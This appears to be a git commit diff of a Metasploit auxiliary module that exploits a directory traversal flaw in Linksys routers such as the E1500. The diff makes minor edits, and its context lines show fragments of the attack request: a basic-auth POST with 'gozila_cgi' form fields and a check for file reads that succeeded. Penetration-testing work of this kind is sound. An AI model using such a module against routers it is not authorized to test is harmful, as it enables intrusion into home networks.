version removed, encode params removed
parent
36d1746c0d
commit
aacd14ae45
|
@ -15,7 +15,6 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
def initialize
|
def initialize
|
||||||
super(
|
super(
|
||||||
'Name' => 'Linksys Directory Traversal Vulnerability',
|
'Name' => 'Linksys Directory Traversal Vulnerability',
|
||||||
'Version' => '$$',
|
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a directory traversal vulnerablity which is present in different
|
This module exploits a directory traversal vulnerablity which is present in different
|
||||||
Linksys home routers like the E1500.
|
Linksys home routers like the E1500.
|
||||||
|
@ -64,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'authorization' => basic_auth(user,pass),
|
'authorization' => basic_auth(user,pass),
|
||||||
'encode_params' => false,
|
#'encode_params' => false,
|
||||||
'vars_post' => {
|
'vars_post' => {
|
||||||
"submit_type" => "wsc_method2",
|
"submit_type" => "wsc_method2",
|
||||||
"change_action" => "gozila_cgi",
|
"change_action" => "gozila_cgi",
|
||||||
|
@ -73,6 +72,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
})
|
})
|
||||||
#puts res.body.length
|
#puts res.body.length
|
||||||
#puts res
|
#puts res
|
||||||
|
#without res.body.length we get lots of false positives
|
||||||
if (res and res.code == 200 and res.body.length > 10)
|
if (res and res.code == 200 and res.body.length > 10)
|
||||||
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
|
print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}")
|
||||||
report_web_vuln({
|
report_web_vuln({
|
||||||
|
|
Loading…
Reference in New Issue